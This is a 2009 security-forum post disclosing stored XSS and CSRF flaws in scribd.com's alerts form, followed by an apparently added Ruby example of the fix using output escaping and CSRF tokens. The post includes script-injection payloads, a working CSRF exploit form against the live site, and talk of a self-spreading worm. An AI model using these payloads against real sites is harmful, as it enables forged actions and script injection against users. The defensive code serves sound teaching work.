sla.ckers.org is
ha.ckers sla.cking
MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com
Posted by: XaDoS
Date: September 18, 2009 03:57PM

The site http://www.scribd.com, a network community (which Obama used for his election campaign), is a big community that competes with amazon.com for the title of most visited site in the world (now scribd has 55 million visits every month).

It's vulnerable to XSS, permanent XSS, JS injection and CSRF.

#### XSS:

### Permanent XSS:

(after login)
At the page http://www.scribd.com/alerts a user can write a new alert, but with malicious JS code like:
Name of alert: "><script>alert(1)</script>
Text of alert: "><script>alert(2)</script>

and so the POST request is like:
<input id="alert_name" name="alert[name]" size="30" style="width: 500px;" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" type="text">

<textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">"&gt;&lt;script&gt;alert(2)&lt;/script&gt;</textarea>

and there is no token or captcha, so an attacker can write CSRF code like this (working!):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>scribd csrf exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<form name="xados" action="http://www.scribd.com/alerts" class="new_alert" id="new_alert" method="post">
    <input id="alert_word_user_id" name="alert[word_user_id]" type="hidden" value="[ID-VICTIM]" />
    <input id="alert_name" name="alert[name]" size="30" style="width: 500px;" type="text" value="[TITLE]" />
    <textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">[MESSAGE]</textarea>
    <input checked="checked" id="alert_matchmode_2" name="alert[matchmode]" type="radio" value="2" />
    <input id="alert_matchmode_1" name="alert[matchmode]" type="radio" value="1" />
    <input name="commit" type="submit" value="submit" />
</form>
</body>
</html>

and through this CSRF one can create an XSS worm that self-replicates through the alerts permanent XSS vuln.

have fun.
0-day by XaDoS

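The post describes two missing controls on the alerts form: the alert name and text are echoed back without HTML encoding (so a value of "><script>alert(1)</script> closes the attribute and runs), and the POST carries no anti-forgery token. The following is an added example, written here and not code from the post or from scribd, of what a defender would put in a Rails-style handler for that form. The handler names (render_alert, create_alert, valid_csrf?), the authenticity_token parameter name and the in-memory store are assumptions for illustration.

```ruby
require "cgi"
require "securerandom"

# Constructed example, not scribd's code. Shows the two controls the post
# reports missing: output encoding of the stored alert fields and a
# per-session CSRF token checked on every POST.

# Render a stored alert. Every user-controlled field is HTML-escaped at
# output time, so "><script>alert(1)</script> is displayed literally instead
# of closing the value attribute and executing in the viewer's browser.
def render_alert(alert)
  name = CGI.escapeHTML(alert[:name].to_s)
  text = CGI.escapeHTML(alert[:text].to_s)
  %(<input id="alert_name" name="alert[name]" type="text" value="#{name}" />\n) +
    %(<textarea id="alert_alert_text" name="alert[alert_text]">#{text}</textarea>)
end

# Issue one random token per session; the real form embeds it as a hidden
# field named authenticity_token (assumed name, matching Rails convention).
def csrf_token_for(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Constant-time string comparison so token checks do not leak timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Reject a POST unless it carries the token bound to the requesting session.
# A form hosted on another origin (like the one in the post) cannot read the
# victim's session to learn the token, so the forged request fails here.
def valid_csrf?(session, params)
  expected = session[:csrf_token]
  supplied = params["authenticity_token"]
  return false if expected.nil? || supplied.nil?
  secure_equal?(expected.to_s, supplied.to_s)
end

# Handle an alert-creation request: CSRF check first, then store the raw
# values. Escaping is done at render time, never at storage time, so the
# stored data stays usable and every output path is protected the same way.
def create_alert(session, params, store)
  return [:forbidden, nil] unless valid_csrf?(session, params)
  alert = {
    name: params.dig("alert", "name").to_s,
    text: params.dig("alert", "alert_text").to_s
  }
  store << alert
  [:created, alert]
end

if __FILE__ == $PROGRAM_NAME
  session = {}
  store = []
  # Constructed request carrying the payload quoted in the post.
  params = { "alert" => { "name" => "\"><script>alert(1)</script>", "alert_text" => "hello" } }
  puts create_alert(session, params, store).first            # :forbidden, no token
  params["authenticity_token"] = csrf_token_for(session)
  status, alert = create_alert(session, params, store)
  puts status                                                # :created
  puts render_alert(alert)                                   # payload shown as &quot;&gt;&lt;script&gt;...
end
```

Note that the escaped output produced by render_alert is exactly the &quot;&gt;&lt;script&gt; form the post shows in its captured request; the difference is that the encoding is applied on every render, not only on the form that echoes the submission.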
